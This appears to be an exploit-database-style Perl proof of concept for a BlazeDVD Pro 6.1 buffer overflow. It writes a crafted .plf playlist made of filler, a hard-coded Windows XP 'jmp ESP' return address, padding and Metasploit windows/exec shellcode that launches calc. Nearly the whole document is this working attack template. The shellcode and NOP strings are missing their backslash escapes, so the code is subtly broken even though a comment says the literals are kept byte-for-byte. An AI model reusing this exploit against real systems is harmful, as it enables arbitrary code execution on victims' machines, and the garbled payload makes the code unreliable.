
BlazeDVD Pro Player 6.1 Buffer Overflow

Posted on 09 April 2014

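## EDB Note, XPSP3 - my $eip = pack('V',0x7c868667); #jmp ESP on kernel32.dll
# Date: Tue Apr 8 2014
# Vendor link: http://www.blazevideo.com/download.htmm
# Software Link: http://www.blazevideo.com/download.php?product=BlazeDVDPro
# App Version: 6.1
# Tested on: Windows XP service pack 2 (en)
#
# Proof-of-concept for the BlazeDVD Pro 6.1 buffer overflow: it builds a
# .plf file consisting of 260 bytes of filler, a fixed kernel32.dll address
# (XP SP2 value here; the EDB note above records the SP3 value), four
# alignment bytes and the metasploit windows/exec "calc" stub.  Because the
# return address is a hard-coded absolute pointer, the PoC only works on
# builds without address randomisation, i.e. the listed XP service packs.
# NOTE(review): every string literal below is kept byte-for-byte as it
# appears on this page; nothing is re-encoded or corrected.
use strict;
use warnings;

my $file = "blazeExpl.plf";

# Filler that occupies the vulnerable buffer up to the overwritten pointer.
my $junk = "A" x 260;

# Little-endian 32-bit address intended to land in EIP (per the variable
# name); pack('V') produces the on-disk byte order.
my $eip = pack('V', 0x7C82385D);    # jmp ESP on kernel32.dll

# Four padding bytes so ESP points at the first byte of the payload.
my $prependesp = "XXXX";

# Short NOP-style run ahead of the payload.
my $shellcode = "x90" x 25;

# windows/exec - 303 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc
$shellcode .= "x89xe2xdaxc1xd9x72xf4x58x50x59x49x49x49x49"
    . "x43x43x43x43x43x43x51x5ax56x54x58x33x30x56"
    . "x58x34x41x50x30x41x33x48x48x30x41x30x30x41"
    . "x42x41x41x42x54x41x41x51x32x41x42x32x42x42"
    . "x30x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4a"
    . "x48x50x44x43x30x43x30x45x50x4cx4bx47x35x47"
    . "x4cx4cx4bx43x4cx43x35x43x48x45x51x4ax4fx4c"
    . "x4bx50x4fx42x38x4cx4bx51x4fx47x50x43x31x4a"
    . "x4bx51x59x4cx4bx46x54x4cx4bx43x31x4ax4ex50"
    . "x31x49x50x4cx59x4ex4cx4cx44x49x50x43x44x43"
    . "x37x49x51x49x5ax44x4dx43x31x49x52x4ax4bx4a"
    . "x54x47x4bx51x44x46x44x43x34x42x55x4bx55x4c"
    . "x4bx51x4fx51x34x45x51x4ax4bx42x46x4cx4bx44"
    . "x4cx50x4bx4cx4bx51x4fx45x4cx45x51x4ax4bx4c"
    . "x4bx45x4cx4cx4bx45x51x4ax4bx4dx59x51x4cx47"
    . "x54x43x34x48x43x51x4fx46x51x4bx46x43x50x50"
    . "x56x45x34x4cx4bx47x36x50x30x4cx4bx51x50x44"
    . "x4cx4cx4bx44x30x45x4cx4ex4dx4cx4bx45x38x43"
    . "x38x4bx39x4ax58x4cx43x49x50x42x4ax50x50x42"
    . "x48x4cx30x4dx5ax43x34x51x4fx45x38x4ax38x4b"
    . "x4ex4dx5ax44x4ex46x37x4bx4fx4dx37x42x43x45"
    . "x31x42x4cx42x43x45x50x41x41";

# Three-arg open on a lexical handle with an explicit failure check; the
# original two-arg open() on a global handle ignored errors entirely, so a
# failed open produced the "created successfully" message with no file.
# binmode stops text-mode translation from altering the written bytes.
open my $fh, '>', $file or die "open $file: $!";
binmode $fh;
print {$fh} $junk . $eip . $prependesp . $shellcode;
# Buffered write errors only surface at close, so it is checked too.
close $fh or die "close $file: $!";

print "plf File Created successfully ";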

 
